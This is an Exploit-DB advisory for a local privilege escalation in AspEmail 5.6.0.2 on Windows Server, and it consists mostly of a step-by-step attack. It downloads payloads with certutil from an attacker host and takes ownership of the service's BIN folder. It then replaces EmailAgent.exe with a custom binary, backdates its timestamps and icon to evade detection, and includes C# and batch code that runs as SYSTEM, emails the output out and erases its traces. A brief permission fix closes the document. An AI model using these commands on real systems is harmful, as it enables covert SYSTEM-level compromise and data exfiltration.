AspEmail v5.6.0.2 - Local Privilege Escalation

EDB-ID:

51380

CVE:

N/A


Author:

Zer0FauLT

Type:

local


Platform:

Windows

Date:

2023-04-20


####################################################################################################################
# Exploit Title:  AspEmail 5.6.0.2 - Local Privilege Escalation                                                    #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability]                             #
# Date: 13/04/2023                                                                                                 #
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]                                                               #
# Vendor Homepage: https://www.aspemail.com                                                                        #
# Software Link: https://www.aspemail.com/download.html                                                            #
# Product: AspEmail                                                                                                #
# Version: AspEmail 5.6.0.2 and all                                                                                #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU                                                    #
# Tested on: Windows Server 2016 and Windows Server 2019                                                           #
# CVE : 0DAY                                                                                                       #
####################################################################################################################

# ==================================================================================================================

[+] C:\PenTest>whoami /priv

 PRIVILEGES INFORMATION
 ----------------------

 Privilege Name                Description                               State   
 ============================= ========================================= ========
 SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
 SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
 SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
 SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
 
# ==================================================================================================================

* First, we will test whether the AspEmail service is active.
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:

[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
   EmailAgent.exe                4400 Persits Software EmailAgent

                           or                                                 

[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
   EmailAgent64.exe                4400 Persits Software EmailAgent
   
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". 
* Now we know that AspEmail service is active.

# ==================================================================================================================

* We will need these:

[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"

# ==================================================================================================================
                                                                                          
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

 Name: Persits Software EmailAgent
 ImagePath         : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
 Agent.exe" /run
 User              : LocalSystem
 ModifiablePath    : C:\Program Files (x86)\Persits Software\AspEmail\BIN
 IdentityReference : Everyone
 Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, 
 AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, 
 ReadExtendedAttributes, DeleteChild, Execute/Traverse
 Status            : Unknown
 UserCanStart      : False
 UserCanStop       : False
 
[+] C:\PenTest>del PrivescCheck.ps1

* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.

# ==================================================================================================================                                                                                     #

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"

    Successfully processed 0 files; Failed processing 1 files
    C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.

* We do not have permission to access subdirectories.

# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"

 C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                            DeepSecLab\psacln:(I)(OI)(CI)(N)
                            DeepSecLab\psaadm:(I)(OI)(CI)(N)
                            DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
                            BUILTIN\Administrators:(I)(F)
                            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                            APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
                            NT SERVICE\TrustedInstaller:(I)(CI)(F)
                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                            BUILTIN\Users:(I)(OI)(CI)(RX)
                            APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
							
* Unlike other directories, we have full privileges in the "BIN" directory of the service. 
* This is chmod 0777 - rwxrwxrwx in linux language.
							
# ==================================================================================================================
													 
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

 __PATH                                                                                                                                                                                                                                                                                                               

 \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"                                                                                                                                                                                   

 \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
                                                                                      root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-32-544"  Win32_SID    Win32_SID  2  Administrators  {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}  BUILTIN  S-1-5-32-544  16
 [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators

* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.

# ==================================================================================================================

* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.

[+] C:\PenTest>whoami
  DeepSecLab\Hacker

[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
  SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F

  processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
  Successfully processed 1 files; Failed processing 0 files
  
* Ok. All commands resulted successfully. We now have full privileges for this directory.  
  
# ==================================================================================================================

* Now we will modify the EmailAgent file and inject a self-written malware. 
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe

# ==================================================================================================================

[+]  C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
   Volume in drive C has no label.
   Volume Serial Number is 0C8A-5291

   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

  14.04.2023  16:47    <DIR>          .
  14.04.2023  16:47    <DIR>          ..
  01.03.2004  15:55           143.360 AspEmail.dll
  25.02.2004  16:23           188.416 AspUpload.dll
  13.04.2023  22:00            12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
  24.09.2003  09:22           139.264 EmailAgentCfg.cpl
  24.09.2003  09:25            94.208 EmailLogger.dll
  24.09.2003  09:21           167.936 Null.EmailAgent.exe
                 6 File(s)        745.472 bytes
                 2 Dir(s)  165.936.717.824 bytes free
			   
# ==================================================================================================================

* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe

* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
* I used the Resource Tuner Console tool. 
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm

# ==================================================================================================================

[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
   Volume in drive C has no label.
   Volume Serial Number is 0C8A-5291

   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

  14.04.2023  16:47    <DIR>          .
  14.04.2023  16:47    <DIR>          ..
  01.03.2004  15:55           143.360 AspEmail.dll
  25.02.2004  16:23           188.416 AspUpload.dll
  24.09.2003  09:21            12.288 EmailAgent.exe
  24.09.2003  09:22           139.264 EmailAgentCfg.cpl
  24.09.2003  09:25            94.208 EmailLogger.dll
  24.09.2003  09:21           167.936 Null.EmailAgent.exe
                 6 File(s)        745.472 bytes
                 2 Dir(s)  165.936.717.824 bytes free
			   
  [24.09.2003  09:21]            12.288 EmailAgent.exe
  [24.09.2003  09:21]           167.936 Null.EmailAgent.exe
  
* And time manipulation is over. They look like they were uploaded at the same time long ago.

# ==================================================================================================================

* Now we check for my malware ownership.

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

  __PATH                                                                                                                                                                                                                                                                                                                                                                                                                                            

  \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"                                                                                                                                                                                                                                                                                                                

  \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"                                                     root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"  Win32_SID    Win32_SID  2  Hacker  {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}  DeepSecLab  S-1-5-21-3674093405-176013069-2091862131-1511  28
  
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name

    Name                  

    DeepSecLab\Hacker  

   EmailAgent.exe Owner: DeepSecLab\Hacker

# =================================================================================================================#
#                                                                                                                  #
####################################################################################################################
#                                               #[EmailAgent.cs]#                                                  #
####################################################################################################################
#                                                                                                                  # 
                                                                                                                   #
* We program this malware in such a way that when the server is reboot(when the services are restarted),           #
* It will be triggered and execute the codes we want,                                                              #
* And then send a printout of all this to the email address we specified.                                          #
                                                                                                                   #
 using System;                                                                                                     #
 using System.Linq;                                                                                                #
 using System.Text;                                                                                                #
 using System.Diagnostics;                                                                                         #
 using System.IO;                                                                                                  #
 using System.Collections;                                                                                         #
                                                                                                                   #
 Namespace CliToolSpace                                                                                            #
 {                                                                                                                 #
     class _Main                                                                                                   #
     {                                                                                                             #
         static void Main(string[] args)                                                                           #
         {                                                                                                         #
             Cli commandLine = new Cli();                                                                          #
             commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");                         #
             commandLine.Execute();                                                                                #
             commandLine.ToFile(@"C:\Windows\Temp\");                                                              #
         }                                                                                                         #
     }                                                                                                             #
 }                                                                                                                 #
                                                                                                                   #
#                                                                                                                  #
####################################################################################################################
#                                                 #[Mail.cs]#                                                      #
####################################################################################################################
#                                                                                                                  #
                                                                                                                   #
 using System;                                                                                                     #
 using System.Net.Mail;                                                                                            #
 using System.Net;                                                                                                 #
 SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");                                                    #
 var mail = new MailMessage();                                                                                     #
 mail.From = new MailAddress("mail@deepseclab.com");                                                               #
 mail.To.Add("mail@hacker.com");                                                                                   #
 mail.Subject = "Trigger Successful!";                                                                             #
 mail.IsBodyHtml = true;                                                                                           #
 string htmlBody;                                                                                                  #
 htmlBody = "<strong>This server has been rebooted.</strong>";                                                     #
 mail.Body = htmlBody;                                                                                             #
 Attachment attachment;                                                                                            #
 attachment = new Attachment(@"C:\Windows\Temp\Export.txt");                                                       #
 mail.Attachments.Add(attachment);                                                                                 #
 SmtpServer.Port = 587;                                                                                            #
 SmtpServer.UseDefaultCredentials = false;                                                                         #
 SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123");                   #
 SmtpServer.EnableSsl = true;                                                                                      #
 SmtpServer.Timeout = int.MaxValue;                                                                                #
 SmtpServer.Send(mail);                                                                                            #
                                                                                                                   #
#                                                                                                                  #
####################################################################################################################
#                                                 #[Run.bat]#                                                      #
####################################################################################################################
#                                                                                                                  #
                                                                                                                   #
  whoami > C:\Windows\Temp\Export.txt                                                                              #
  cd C:\Program Files (x86)\Persits Software\AspEmail\Bin                                                          #
  del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe                                                      #
  cd c:\Windows\Tasks                                                                                              #
  del Run.bat & del Mail.exe                                                                                       #
                                                                                                                   #
#                                                                                                                  #
####################################################################################################################
#                                                                                                                  #
                                             [+]Trigger Successful![+]                                             #
												                   #
[+] C:\PenTest>systeminfo | findstr "Boot Time"                                                                    #
  System Boot Time:          13.04.2022, 07:46:06                                                                  #
                                                                                                                   #
#                                                                                                                  #
####################################################################################################################
                                                  #[Export.txt]#                                                   #
####################################################################################################################
#                                                                                                                  #
                                                                                                                   #
                                                NT AUTHORITY\SYSTEM				                   #
                                                                                                                   #
#                                                                                                                  #
####################################################################################################################
#													           #									   
# ==================================================================================================================
#                                                   ...|||[FIX]|||...                                              #
# ==================================================================================================================
#                                [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+]                     #
# =================================================================================================================#

[+] C:\Administrator>sc qc "Persits Software EmailAgent"
  [SC] QueryServiceConfig SUCCESS

  SERVICE_Name: Persits Software EmailAgent
          TYPE               : 10  WIN32_OWN_PROCESS
          START_TYPE         : 2   AUTO_START
          ERROR_CONTROL      : 1   NORMAL
          BINARY_PATH_Name   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
          LOAD_ORDER_GROUP   :
          TAG                : 0
          DISPLAY_Name       : Persits Software EmailAgent
          DEPENDENCIES       : rpcss
          SERVICE_START_Name : LocalSystem

# ==================================================================================================================

[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"

    D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

# ==================================================================================================================

[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula

  Accesschk v6.15 - Reports effective permissions for securable objects
  Copyright (C) 2006-2022 Mark Russinovich
  Sysinternals - www.sysinternals.com

  Persits Software EmailAgent
    Medium Mandatory Level (Default) [No-Write-Up]
    RW NT AUTHORITY\SYSTEM
          SERVICE_ALL_ACCESS
    RW BUILTIN\Administrators
          SERVICE_ALL_ACCESS
		
# ==================================================================================================================

[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"

  Successfully processed 0 files; Failed processing 1 files
  C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.

                                            DONE!

# ==================================================================================================================

[+] C:\Administrator>sc stop "Persits Software EmailAgent"

[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"

* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.

# ==================================================================================================================